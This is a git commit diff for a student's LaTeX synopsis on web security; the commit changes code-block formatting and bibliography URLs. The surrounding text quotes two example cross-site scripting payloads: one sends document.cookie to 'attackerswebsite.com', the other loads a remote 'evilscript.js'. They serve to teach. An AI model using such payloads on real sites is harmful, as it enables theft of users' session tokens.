diff options
| author | marcinzelent <zelent.marcin@gmail.com> | 2018-05-26 18:49:20 +0200 |
|---|---|---|
| committer | marcinzelent <zelent.marcin@gmail.com> | 2018-05-26 18:49:20 +0200 |
| commit | eff77c82628eebfb59aef8ab0e212cb25a26e554 (patch) | |
| tree | 8b475e1529f50692092d57e7ecc698419fa71ee8 | |
| parent | 313c9116d67956daf0c3db9d39eb4824f1613a08 (diff) | |
Fixed formatting
| -rw-r--r-- | synopsis.pdf | bin | 156299 -> 165241 bytes | |||
| -rw-r--r-- | synopsis.tex | 8 |
2 files changed, 4 insertions, 4 deletions
diff --git a/synopsis.pdf b/synopsis.pdf Binary files differindex 428edc3..6b34d2b 100644 --- a/synopsis.pdf +++ b/synopsis.pdf diff --git a/synopsis.tex b/synopsis.tex index 36494d2..26814cb 100644 --- a/synopsis.tex +++ b/synopsis.tex @@ -439,7 +439,7 @@ example could be a comment on a forum, which contains Javascript code. If the vulnerability is present, it will not be displayed on the page, but it will be executed. It could be simple like: -\begin{minted}{js} +\begin{minted}{html} <script>document.createElement('img').src = 'http://attackerswebsite.com/' + document.cookie</script> \end{minted} @@ -448,7 +448,7 @@ This script would create an HTTP request to attacker's website with the victim's cookies, which could contain for example very useful session token. It is also possible to include much bigger scripts with: -\begin{minted}{js} +\begin{minted}{html} <script src="http://attackerswebsite.com/evilscript.js"></script> \end{minted} @@ -602,13 +602,13 @@ end, I managed to finish my synopsis on time, so it is not a big issue. \bibitem{sbd} OWASP. \textit{Security by Design Principles}. - \texttt{https://www.owasp.org/index.php/\allowbreak{} + \texttt{https://owasp.org/index.php/\allowbreak{} Security\_by\_Design\_Principles} \bibitem{sdl} Microsoft. \textit{Security Development Lifecycle}. - \texttt{https://www.microsoft.com/sdl} + \texttt{https://microsoft.com/sdl} \end{thebibliography} |